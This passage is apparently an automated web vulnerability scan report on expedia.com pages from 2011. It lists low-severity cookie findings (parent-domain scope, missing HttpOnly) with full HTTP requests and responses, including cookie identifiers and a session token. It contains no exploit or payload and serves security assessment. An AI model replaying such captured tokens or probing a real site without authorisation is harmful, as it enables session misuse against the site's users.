Set-Cookie: SSRT1=-_P1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:26:51 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...

2.6. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/promos/deals/summervacationsale/destination_deals.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/promos/deals/summervacationsale/destination_deals.asp?tab=1&dest=Las%20Vegas,%20NV&mcicid=ssdestdeal1 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 68126
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
Vary: Accept-Encoding
RTSS: 1
Content-Length: 68347
Date: Mon, 13 Jun 2011 11:27:08 GMT
Connection: close
Set-Cookie: SSRT1=DPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:08 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Te
...[SNIP]...

2.7. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/promos/doubleclick_ads/summervacationsale/summersale_staffpicks_416x366.asp?7854 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 9539
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 9539
Expires: Sat, 11 Dec 2010 18:01:23 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=B_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:03 GMT


<style type="text/css">
body{padding:0;margin:0}
#PcoWrapper { font-family:Arial;width:416px;height:366px;padding:0px;margin:0px;}

.pcoImage {position:relative;width:416px;height:366px;}
.pc
...[SNIP]...

2.8. http://www.expedia.com/daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/promos/doubleclick_ads/summervacationsale/summersale_top10deals_nyc_308x343.asp?7935 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; aspp=v.1,0|summersale2011%3Fbrandcid%3DbrandCampaign|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 8630
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 8630
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:03 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=B_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:03 GMT


<style type="text/css">
body{padding:0;margin:0}
#PcoWrapper { font-family:Arial;width:308px;height:343px;padding:0px;margin:0px;}

.pcoImage {position:relative;width:308px;height:343px;}
.pc
...[SNIP]...

2.9. http://www.expedia.com/hotel.h892034.Hotel-Information  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /hotel.h892034.Hotel-Information

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /hotel.h892034.Hotel-Information?chkin=7/14/2011&chkout=7/18/2011&rm1=a2&hashTag=default&mcicid=112321680 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; SSLB=1; ipsnf3=v.3|US|1|511|washington

Response

HTTP/1.1 301 Moved Permanently
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Location: http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Content-Length: 0
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:39 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:14 GMT
Connection: close
Set-Cookie: SSLB=1; path=/; domain=.expedia.com
Set-Cookie: SSRT1=EvT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:14 GMT
Set-Cookie: iEAPID=0000,; Domain=.expedia.com; Path=/


3. Cookie without HttpOnly flag set  previous  next
There are 9 instances of this issue:

Issue background

If the HttpOnly attribute is set on a cookie, then the cookie's value cannot be read or set by client-side JavaScript. This measure can prevent certain client-side attacks, such as cross-site scripting, from trivially capturing the cookie's value via an injected script.

Issue remediation

There is usually no good reason not to set the HttpOnly flag on all cookies. Unless you specifically require legitimate client-side scripts within your application to read or set a cookie's value, you should set the HttpOnly flag by including this attribute within the relevant Set-cookie directive.

You should be aware that the restrictions imposed by the HttpOnly flag can potentially be circumvented in some circumstances, and that numerous other serious attacks can be delivered by client-side script injection, aside from simple cookie stealing.



3.1. http://www.expedia.com/New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.expedia.com
Path:   /New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /New-York-Hotels-Millenium-Hilton.h892034.Hotel-Information?chkin=7%2F14%2F2011&hashTag=default&chkout=7%2F18%2F2011&mcicid=112321680&rm1=a2 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534; ipsnf3=v.3|US|1|511|washington; SSLB=1; SSRT1=yvL1TQE; iEAPID=0000,

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Vary: Accept-Encoding
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:03:04 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:18 GMT
Connection: close
Connection: Transfer-Encoding
Set-Cookie: SSLB=1; path=/; domain=.expedia.com
Set-Cookie: SSRT1=E_T1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:15 GMT
Set-Cookie: JSESSION=ed77ff0b-ce9e-439e-a470-a8216bfecaab; Domain=.expedia.com; Path=/
Set-Cookie: s1=`0; Domain=.expedia.com; Path=/
Set-Cookie: p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; Domain=.expedia.com; Expires=Sun, 12-Jun-2016 16:31:10 GMT; Path=/
Content-Length: 536572

<!DOCTYPE html>
<html xmlns:og="http://opengraphprotocol.org/schema/"
xmlns:fb="http://www.facebook.com/2008/fbml">
   <head>
       <meta name="language" content="en_US"/>
<meta name="robots" con
...[SNIP]...

3.2. http://www.expedia.com/daily/prod/xmlgrid/loadingImage.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/prod/xmlgrid/loadingImage.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/prod/xmlgrid/loadingImage.asp HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; bn_u=5368708931696218534; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 163
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 163
Expires: Sat, 11 Dec 2010 18:02:39 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:08 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=DPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:08 GMT


<div style="text-align:center;padding:40px;">Loading deals...<br/><img src="http://www.expedia.com/eta/nocache/stampa.gif" alt="" WIDTH="82" HEIGHT="10"/></div>

3.3. http://www.expedia.com/daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/prod/xmlgrid/psf/HotelAndPkgStandard.aspx?&lob=hotels&region=7923&sort=&filter=&dest=New%20York%20City%20(Manhattan),%20NY&ps=25&host=www.expedia.com HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
X-AspNet-Version: 2.0.50727
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Type: text/html; charset=utf-8
ntCoent-Length: 100249
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:11 GMT
Content-Length: 100249
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSRT1=DvT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:10 GMT


<html xmlns="http://www.w3.org/1999/xhtml">


<script type="text/javascript" language="Javascript">
function sendData()
{
   try
   {
       var f = (navigator.userAgent.indexOf("Firefox") > 0) ? 4
...[SNIP]...

3.4. http://www.expedia.com/daily/prod/xmlgrid/psf/PsfGridActivities.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/prod/xmlgrid/psf/PsfGridActivities.asp

Issue detail

The following cookies were issued by the application and do not have the HttpOnly flag set:The cookies do not appear to contain session tokens, which may reduce the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /daily/prod/xmlgrid/psf/PsfGridActivities.asp?dest=New%20York%20City&promo=summersale2011&r=0.3934101234190166 HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp?tab=0&dest=New%20York%20City%20(Manhattan),%20NY&mcicid=ssdestdeal2
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; SSLB=1; SSID1=AwC9VSkAAAAA5ufnTf9NBgHm5-dNAgB_8vVNAAAAAAAAAAB_8vVNAQAzAAAAWgcAAAI; SSSC1=1.G5613710435586297343.2.51.1882; SSRT1=f_L1TQE; ipsnf3=v.3|US|1|511|washington; COOKIECHECK=1; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; aspp=v.1,0|ssdestdeal2|||||||||MCI|20110713|; s_sess=%20s_cc%3Dtrue%3B%20s_sq%3D%3B; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
ntCoent-Length: 1112
Content-Type: text/html
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Content-Length: 1112
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
RTSS: 1
Date: Mon, 13 Jun 2011 11:27:12 GMT
Connection: close
Vary: Accept-Encoding
Set-Cookie: SSLB=1; path=/; domain=.expedia.com
Set-Cookie: SSRT1=EPT1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:27:12 GMT
Set-Cookie: ipsnf3=v.3|US|1|511|washington; expires=Wed, 13-Jun-2012 00:00:01 GMT; path=/; domain=.expedia.com;

<?xml version="1.0"?>
<div class="morewaysCustomTop"></div><div class="morewaysCustom"><div class="morewaysCustomInner"><div class="activityTitle">New York City Activities</div><div class="activityDe
...[SNIP]...

3.5. http://www.expedia.com/daily/promos/deals/summervacationsale/default.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/promos/deals/summervacationsale/default.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /daily/promos/deals/summervacationsale/default.asp?mcicid=summersale2011?brandcid=brandCampaign HTTP/1.1
Host: www.expedia.com
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-7494156027018342&output=html&h=90&slotname=0457253054&w=728&lmt=1307982003&flash=10.3.181&url=http%3A%2F%2Fwww.twackle.com%2Fheadlines&dt=1307964003240&bpp=7&shv=r20110608&jsv=r20110607&correlator=1307964003248&frm=4&adk=3937882929&ga_vid=614070449.1307962974&ga_sid=1307962974&ga_hid=997306818&ga_fc=1&u_tz=-300&u_his=5&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=9&u_nmime=45&biw=1065&bih=926&ref=http%3A%2F%2Fwww.twackle.com%2F&fu=0&ifi=1&dtd=21&xpc=5g2L9BvBMy&p=http%3A//www.twackle.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SSID1=AwCDeikAAAAA5ufnTf9NBgHm5-dNAQDm5-dNAAAAAAAAAADm5-dNAQAnAAAA-gQAAAI; MC1=GUID=F398C033545B4D3D89FE3B1CF839F8D4; SSRT1=5-fnTQE; lsrc=v.1,06/16/2011; p1=`tpid=v.1,1`airp=v.1,WAS`linfo=v.4,|0|0|255|1|0||||||||1033|0|0||0|0|0|-1|-1`76; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; aspp=v.1,0|buttons-meta.microsoft.farecast.buttons.flight.homepage.|||||||||OLA|20110702|; U9Z5=3GliPSECvgQGEk9h7y_oiNSot20RvvabDr74at3hDoHKA0LNmA2sm1A; s_vi=[CS]v1|26F3F40305011174-40000111E015E55F[CE]; bn_u=5368708931696218534

Response

HTTP/1.1 200 OK
Server: Microsoft-IIS/6.0
P3P: policyref="/w3c/p3p.xml", CP="CAO DSP IND COR ADM CONo CUR CUSi DEV PSA PSD DELi OUR COM NAV PHY ONL PUR UNI"
Cteonnt-Length: 71777
Content-Type: text/html; Charset=iso-8859-1
Cache-Control: private, max-age=0, proxy-revalidate, no-store, no-cache, must-revalidate
Expires: Sat, 11 Dec 2010 18:02:13 GMT
Pragma: no-cache
Vary: Accept-Encoding
RTSS: 1
Content-Length: 71998
Date: Mon, 13 Jun 2011 11:26:51 GMT
Connection: close
Set-Cookie: SSRT1=-_P1TQE; path=/; domain=.expedia.com; expires=Tue, 12-Jun-2012 11:26:51 GMT


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml"><!-- InstanceBegin template="/Temp
...[SNIP]...

3.6. http://www.expedia.com/daily/promos/deals/summervacationsale/destination_deals.asp  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www.expedia.com
Path:   /daily/promos/deals/summervacationsale/destination_deals.asp

Issue detail

The following cookie was issued by the application and does not have the HttpOnly flag set:The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

